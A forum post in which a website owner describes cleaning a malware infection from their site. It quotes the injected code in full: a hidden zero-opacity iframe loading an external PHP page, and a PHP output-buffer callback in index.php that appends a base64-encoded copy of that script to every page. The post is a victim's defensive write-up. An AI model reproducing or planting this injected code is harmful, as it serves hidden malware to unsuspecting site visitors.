[eluser]CocoMansur[/eluser]
Recently i encountered a Malware, a script was injected on our website
Code:
[removed][removed]('<style>.vb_style_forum {filter:
alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div
class="vb_style_forum"><iframe height="150" width="200"
src="http://vidintex.com/includes/class.pop.php"></iframe></div>');[removed]
bad for me i wasn't able to have a clean back-up of our whole website. so i did was download all the files in public_html/ then scanned it with Kaspersky av, treats were detected and cleaned, i also made a string search regarding the script and found 3 .js files that has that script and also deleted it. scanned again with an AV and it's now clean.
uploaded the whole files to the web server and everything seems fine, but then i noticed there is gap at the bottom of the page, i checked the source code and found out that a script was still appended at the bottom of the page, after the </html> tag.
i did a string search again with the files but the script was not found, then i did a manual search and noticed index.php has an injected code
Code:
ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD5kb2N1bWVudC53cml0ZSgnPHN0eWxlPi52Yl9zdHlsZV9mb3J1bSB7ZmlsdGVyOiBhbHBoYShvcGFjaXR5PTApO29wYWNpdHk6IDAuMDt3aWR0aDogMjAwcHg7aGVpZ2h0OiAxNTBweDt9PC9zdHlsZT48ZGl2IGNsYXNzPSJ2Yl9zdHlsZV9mb3J1bSI+PGlmcmFtZSBoZWlnaHQ9IjE1MCIgd2lkdGg9IjIwMCIgc3JjPSJodHRwOi8vdmlkaW50ZXguY29tL2luY2x1ZGVzL2NsYXNzLnBvcC5waHAiPjwvaWZyYW1lPjwvZGl2PicpOzwvc2NyaXB0Pg==');}
I deleted the code and the appended script at the page is now gone. any ideas how they managed to inject that code?
anyways i also posted this in-case someone might have this same problem in the future.